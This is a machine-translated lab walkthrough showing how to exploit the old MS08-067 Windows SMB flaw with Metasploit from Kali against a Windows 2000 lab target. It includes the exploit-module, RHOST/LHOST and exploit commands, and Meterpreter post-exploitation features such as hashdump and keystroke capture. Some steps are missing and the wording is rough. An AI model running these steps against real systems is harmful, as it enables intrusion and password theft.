Use Metaspoit to attack ms08-067

Source: Internet
Author: User

Use Metaspoit to attack ms08-067

The ms08-067 vulnerability is all known as the Windows Server service RPC request buffer Overflow vulnerability, which could allow remote code execution if a user receives a specially crafted RPC request on an affected system.

On Microsoft Windows 2000Windows XP and Windows Server 2003 systems, an attacker may be able to run arbitrary code with this vulnerability without authentication, a vulnerability that could be used for a worm attack, and there is already a worm that exploits the vulnerability. Firewall best practices and standard default firewall configurations help protect network resources from attacks originating outside the enterprise, and by default can establish an empty connection.
The attack on this experiment was Kali, and target drone was win2kserver.

1. View the attack IP address

Target drone IP

2, use Metasploit in Kali, first start PostgreSQL database service and Metasploit service

Service PostgreSQL start//Startup database
Service Metasploit start//Start Metasploit

3. Note Because there is no Metasploit in the high version Kali, you can use the following command to connect to the database service


Find out if there is a ms08-067 vulnerability and see the appropriate information returned

4. Enter the exploit using this vulnerability: command: use Exploit/windows/smb/ms08_067_netapi; after execution, the following is done:

5. Set the address of the target drone and attack aircraft

Set RHOST 192.168.11.40
Set Lhost 192.168.11.35

6. The next step is to implement the attack and execute the command exploit

Enclosed is an introduction to Meterpreter: http://www.xuebuyuan.com/1993953.html
Meterpretershell as a penetration module has a lot of useful functions, such as adding a user, hiding something, open the shell, get the user password, upload files to download remote host, run Cmd.exe, capture the screen, get remote control, capture key information, clear the application , displays the system information of the remote host, displays information such as the network interface and IP address of the remote machine.

7, using Meterpretershell as an example of the Penetration module 7.1, the target system to obtain the screen:

It's placed under the root path of your Kali.

Also can use command PS to get the system current list of processes, PWD get the current working directory and user ID, hashdump get target system password hash (password hash), etc., in the not repeat.

Use Metaspoit to attack ms08-067

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.